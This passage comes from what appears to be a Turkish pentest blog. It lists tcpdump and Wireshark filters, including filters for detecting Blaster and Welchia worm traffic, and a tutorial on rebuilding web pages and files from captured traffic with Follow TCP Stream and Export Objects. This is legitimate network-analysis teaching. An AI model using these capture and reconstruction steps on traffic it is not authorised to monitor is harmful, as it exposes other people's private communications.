IP adresi 172.18.5.4 olan traifk--> host 172.18.5.4</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
IP aralığı .0/24 olan trafik --> net 192.168.0.0/24</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
IP aralığı 192.168.0.0/24 ve mask değeri 255.255.255.0 olan trafik</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-2">net 192.168.0.0/24 or </span>mask 255.255.255.0 </li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Kaynak makinadan giden network trafiği ve IP aralığı</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
src net 192.168.0.0/24</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
src net 192.168.0.0 or mask 255.255.255.0</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Hedef makinanın Ip aralığı 192.168.0.0/24 olan trafik</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-5"></span>dst net 192.168.0.0/24 </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
or<span class="anchor" id="line-48"></span><span class="anchor" id="line-49"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-6"></span>dst net 192.168.0.0 mask 255.255.255.0 </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
DNS (port 53) trafiği:<span class="anchor" id="line-54"></span><span class="anchor" id="line-55"></span><br />
<br />
<a name='more'></a><br /></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-7"></span>port 53 </li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Host adresi www.example.com olan ve 80 ile 25 portundan gelmeyen trafikler</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-8"></span>host www.example.com and not (port 80 or port 25) <span class="anchor" id="line-1-9"></span>host www.example.com and not port 80 and not port 25<br />
</li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
DNS trafiği olup ARP trafiği olmayan:<span class="anchor" id="line-69"></span><span class="anchor" id="line-70"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-10"></span>port not 53 and not arp </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
TCP portlarından 1501-1549 arasındaki trafik</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-12"></span>tcp portrange 1501-1549</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Hedef MAC adresi 01:80:c2:00:00:0e olmayan</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-14"></span>not ether dst 01:80:c2:00:00:0e </li>
</ul>
<div class="line874" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Broadcast ve multicast olmayan trafik</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-16"></span>not broadcast and not mcast ulticast </li>
</ul>
<div class="line867" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Blaster worm Tespiti:</strong></span><span class="anchor" id="line-126"></span><span class="anchor" id="line-127"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-19"></span>dst port 135 and tcp port 135 and ip[2:2]==48 </li>
</ul>
<div class="line867" data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Welchia worm Tespiti:</strong></span><span class="anchor" id="line-132"></span><span class="anchor" id="line-133"></span></div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-20"></span>icmp[icmptype]==icmp-echo and ip[2:2]==92 and icmp[8:4]==0xAAAAAAAA</li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
TCP portu 25 olan ICMP paketlerini</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>tcp.port eq 25 or icmp</li>
<li></li>
</ul>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Kaynak IP adres aralığı 192.168.0.0/16 ve hedef IP adres alığı 192.168.0.0/16</div>
<ul data-mce-style="color: #000000;" style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li><span class="anchor" id="line-1-1"></span>ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16 </li>
<li></li>
</ul>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>HTTP Trafiği</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
--> http</div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
URL kısmında flv,swf geçen veya video ,flash tipinde olan paketler</div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<pre class="tb" id="ptb1" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">--> http.request.uri contains "flv" or http.request.uri contains "swf" or http.content_type contains "flash" or http.content_type contains "video"</pre>
<pre class="tb" id="ptb1" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">HTML cevap sayfaları</span></strong></div>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">#404: page not found sayfasını bulma
--> http.response.code == 404
#200: OK sayfasını bulma</pre>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">--> http.response.code == 200</pre>
<pre class="tb" id="ptb4" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">HTTP Metotları</span></strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><br /></span></strong></div>
<pre class="tb" id="ptb5" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.request.method == "POST" || http.request.method == "PUT"</pre>
<pre class="tb" id="ptb5" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;">Dosya türü "text" ile başlayan paketler</span></strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><br /></span></strong></div>
<pre class="tb" id="ptb6" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type[0:4] == "text"</pre>
<pre class="tb" id="ptb6" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>HTTP trafiğinde "javascript" geçen paketler</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<pre class="tb" id="ptb7" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type contains "javascript"</pre>
<pre class="tb" id="ptb7" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><span data-mce-style="color: #000000;" style="color: black;"><a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegifjpegpngetc" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegifjpegpngetc" id="Show_http_content-typeimagegifjpegpngetc"><span data-mce-style="color: #000000;" style="color: black;">Tipi="image/(gif|jpeg|png|etc)"</span></a> <a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#toc" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#toc"><span data-mce-style="color: #000000;" style="color: black;">^</span></a> </span>olanlar</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<pre class="tb" id="ptb8" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type[0:5] == "image"</pre>
<pre class="tb" id="ptb8" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="color: #000000;" style="color: black;"><strong><a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegif" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#Show_http_content-typeimagegif" id="Show_http_content-typeimagegif"><span data-mce-style="color: #000000;" style="color: black;">Tipi ="image/gif"</span></a> <span data-mce-style="color: #000000;" style="color: black;"><a data-mce-href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#toc" href="http://www.askapache.com/software/sniff-http-to-debug-apache-htaccess-and-httpdconf.html#toc">^</a></span></strong></span></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="color: #000000;" style="color: black;"><strong><br /></strong></span></div>
<pre class="tb" id="ptb9" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;">http.content_type == "image/gif"</pre>
<pre class="tb" id="ptb9" style="color: #333333; font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;"></pre>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>HTTP başlığı TRACE olmayan paketler</strong></div>
<div data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong><br /></strong></div>
<div class="pretb" data-mce-style="color: #373737;" style="color: #373737; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<div class="tb">
http.request.method != "TRACE"</div>
<div class="tb">
<br /></div>
<strong>HTTP başlığı GET olan paketler</strong><br />
<strong><br /></strong>
<br />
<div class="tb">
http.request.method = "GET"</div>
<div class="tb">
<br /></div>
<div class="tb">
<strong>HTTP başlığı POST olan paketler</strong></div>
<div class="tb">
<strong><br /></strong></div>
<div class="tb" id="ptb10">
http.request.method = "POST"</div>
<div class="tb" id="ptb10">
<br /></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>TELNET</strong></span></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong><br /></strong></span></div>
<div class="tb">
telnet</div>
<div class="tb">
<br /></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>FTP</strong></span></div>
<div class="tb">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong><br /></strong></span></div>
<div class="tb">
ftp</div>
</div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-61048783865860219202014-09-23T09:33:00.003+03:002015-01-20T22:23:40.827+02:00Wireshark ile Follow TCP-UDP Stream ve Export Object Özellikleri<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b>Wireshark</b>,istenilen trafiği dinlerken kullanıcıya akan trafiği satır satır gösterir.Bir web sitesinde dolaşırken sitede yapılan her işlem trafikte görülür.Ancak akan trafik sadece <b>TCP-IP</b> protokol yapısına aşina iseniz anlaşılırdır.Üstelik bir web sitesinde dolaşırken aynı zamanda <b>YOUTUBE </b>da video izliyorsanız wireshark trafiği anlık kayıt edeceği için aradığınız satırları filtreleme yapmadan bulmanız zorlaşacaktır.Bulsanız bile <b>TCP-IP</b> protokol yapısında olacağı için anlaşılır olmaz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Peki akan trafiği anlaşılır bir şekilde görüntüleyebilir miyiz. Mesela web siteleri http protokol yapısına sahip ve yazılım dili HTML dir.Trafiği biz bu formatlarda görebilir miyiz.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bir sitede bir resmi görüntülerken onu byte byte trafikte görüntüleyebilirsiniz.Ancak biz bunu gerçek resim formatında yani görsel olarak nasıl görebiliriz. İşte bu nokta wireshark bize çok önemli bir özelliğini sunuyor <strong>"Follow TCP/UDP Stream".</strong></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bir web sayfasının trafiği dinleyelim.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfypa6bgrvWUDlHEqhJEru2YlJhVWFhEoO3-OaF79Gn01Ug68kTMGhquwNrIOrKk8Qr4A4oGU_vf_j4NcGcE9aBXAiojNbUMFJZ40jRFDqUR7Hxz6GC2K1tmkSzj5xsBzVe64gTJuh2FM/s1600/f1-1024x550.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfypa6bgrvWUDlHEqhJEru2YlJhVWFhEoO3-OaF79Gn01Ug68kTMGhquwNrIOrKk8Qr4A4oGU_vf_j4NcGcE9aBXAiojNbUMFJZ40jRFDqUR7Hxz6GC2K1tmkSzj5xsBzVe64gTJuh2FM/s1600/f1-1024x550.png" height="213" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Bu trafik içerisinde açık yeşil olan satırlar aynı kaynağın trafiğidir.Yeşil satırlardan herhangi birine sağ tıklayıp ;</span><br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtFYYXhscacA1vWBUIKGlQow-z2uXQCxYOeiKOCIe_j3rYQ9ludXmGxEVBo69PdSi7kQamG22AiA2SH2vP4pKI1ujVLAHBBSA9VyvKpwcBoTygTsZaqz0lZuJmrTCobdyeH9dhztytsA/s1600/f2-1024x428.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxtFYYXhscacA1vWBUIKGlQow-z2uXQCxYOeiKOCIe_j3rYQ9ludXmGxEVBo69PdSi7kQamG22AiA2SH2vP4pKI1ujVLAHBBSA9VyvKpwcBoTygTsZaqz0lZuJmrTCobdyeH9dhztytsA/s1600/f2-1024x428.png" height="166" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><b>"Follow TCP Stream"</b> dersek bizi <b>1</b> ler ve <b>0 </b>lardan oluşan trafiğin anlamlı haline götürecektir.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibO3l-65x5tbdk-OGaqzj-HqUxic9_Mmj3nHoq2trALGO4iviBvzvtf7tmujB3Fr8YPxpERHL97F7lkxWxMb1ByZkuxdTqqdhFDZhpnEuWwyNzRdhAZKxWntM2tNn11d3mEHWpcB69sNg/s1600/f3-1024x549.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibO3l-65x5tbdk-OGaqzj-HqUxic9_Mmj3nHoq2trALGO4iviBvzvtf7tmujB3Fr8YPxpERHL97F7lkxWxMb1ByZkuxdTqqdhFDZhpnEuWwyNzRdhAZKxWntM2tNn11d3mEHWpcB69sNg/s1600/f3-1024x549.png" height="213" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Yukarıdaki resimde akan trafiğin karşılığının yani gezindiğiniz sitenin html kodlarına ulaşırsınız.Biz bu trafiği istersek kaydedebiliriz.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ebFGh8jmOz6PdyQ1I0mqiv-7RZvOHvqEk_WcevbZUFEgXhKbAr2IqgtxWW2VkBdPhRcz9e5RLFfDnAxADcKoyzhM5jgFBGOi8GIn4p0CauBKpm1xH-s5ClpkSmSsKDX1Vv8o-fER3JM/s1600/f5-1024x74.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ebFGh8jmOz6PdyQ1I0mqiv-7RZvOHvqEk_WcevbZUFEgXhKbAr2IqgtxWW2VkBdPhRcz9e5RLFfDnAxADcKoyzhM5jgFBGOi8GIn4p0CauBKpm1xH-s5ClpkSmSsKDX1Vv8o-fER3JM/s1600/f5-1024x74.png" height="28" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><b>"Save As"</b> butonuna tıklayınca kayıt alanını seçmemizi istiyor.İstediğimiz alana kayıt edip inceleyebiliriz.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWfUVd1eSPPsoTTw7Ex0prAgGS7WhGvyxPdzdqF3BbfKcKdU16hH_6uR1V9Z90bmIwJvPd8LXM8gPM54wH16t7EgAxHCIY0Mxi50yttZPBCq3NPXFZJUPaod205A-qQNJnVrbdoovtG0/s1600/f6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWfUVd1eSPPsoTTw7Ex0prAgGS7WhGvyxPdzdqF3BbfKcKdU16hH_6uR1V9Z90bmIwJvPd8LXM8gPM54wH16t7EgAxHCIY0Mxi50yttZPBCq3NPXFZJUPaod205A-qQNJnVrbdoovtG0/s1600/f6.png" height="315" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Export Object Özelliği:</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bu özellikle de akan trafikten tüm formatlardaki dosyaları görüp kayıt altına alabiliriz.File menüsünden ulaşıp <b>Export Objects --> HTTP</b> seçeneğinde bu protokole<b>(HTTP) </b>ait verileri görebiliriz.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaY7eS24xhvJbRf3Ap0j0q0WPJYhx8UYkUYUJ5FUAzrCQ_NQrBG9-OZ03HakujqB4T3mLhx2NYtPeEQfIUfD5z_mQ_94LPDcV7JsexCVESquMpEKOT5DCFeruA3aSx9TRqBwgcDhpuRj4/s1600/f8-1024x427.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaY7eS24xhvJbRf3Ap0j0q0WPJYhx8UYkUYUJ5FUAzrCQ_NQrBG9-OZ03HakujqB4T3mLhx2NYtPeEQfIUfD5z_mQ_94LPDcV7JsexCVESquMpEKOT5DCFeruA3aSx9TRqBwgcDhpuRj4/s1600/f8-1024x427.png" height="166" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><b>Export Objects --> HTTP</b> seçeneğine tıkladığımızda trafikten geçen tüm verilerin asıl formatlarını görebiliriz.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC3uj3qXpI5BY5YjM2Pf5mYz32CGwwWRGcJqpyIgj5pddrSpq2-bgFim4dzNUQBFuTWxQI6Pixy9K9POnZtmZE6wlKUODLUHWVRGYkqgVu7Z3khSu2rH1h7McnvqDa_lPUOnnXiv_i8Lg/s1600/f9-1024x674.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC3uj3qXpI5BY5YjM2Pf5mYz32CGwwWRGcJqpyIgj5pddrSpq2-bgFim4dzNUQBFuTWxQI6Pixy9K9POnZtmZE6wlKUODLUHWVRGYkqgVu7Z3khSu2rH1h7McnvqDa_lPUOnnXiv_i8Lg/s1600/f9-1024x674.png" height="262" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0